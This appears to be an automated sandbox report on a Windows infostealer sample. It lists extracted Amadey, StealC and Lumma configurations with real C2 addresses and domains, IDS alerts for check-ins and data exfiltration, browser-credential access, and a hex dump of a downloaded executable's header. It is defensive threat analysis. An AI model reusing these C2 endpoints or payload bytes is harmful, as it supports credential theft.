Found malware configuration

Source: 00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 4136f86ac7.exe.9108.37.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: 4136f86ac7.exe.9108.37.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["navygenerayk.store", "fadehairucw.store", "necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C636C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C636C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C78A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C784440 PK11_PrivDecrypt,	0_2_6C784440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C754420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C754420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7844C0 PK11_PubEncrypt,	0_2_6C7844C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C7D25B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C768670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C78A650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C76E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C7AA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C7B0180

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.64.117.218:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.5:50270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50324 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0ac2a0f3ae.exe, 00000024.00000002.3119535099.0000000000A12000.00000040.00000001.01000000.00000019.sdmp, 0ac2a0f3ae.exe, 00000024.00000003.2983049780.0000000004F00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe

Directory queried: number of queries: 1583

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50229 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50234
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50242 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50250 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.5:50259 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:61484 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:65482 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:61200 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:58600 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:50625 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50271 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:54900 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54876 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50287 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50291 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50289 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54284 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62605 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:52747 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:56622 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:50952 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:60270 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:49989 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50295 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:54551 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:55296 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50307 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50319 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:49494 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:60239 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:64465 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:60011 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:56957 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:49173 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:55407 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:59274 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50323 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50327 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50270 -> 23.210.122.61:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50252 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50282 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50292 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50296 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50297 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50264 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50294 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50273 -> 172.67.174.133:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50278 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50301 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50303 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50316 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50324 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50313 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	IPs: 185.215.113.43

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: l.exe.23.dr

Source: global traffic

TCP traffic: 192.168.2.5:50312 -> 5.79.74.169:12000

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
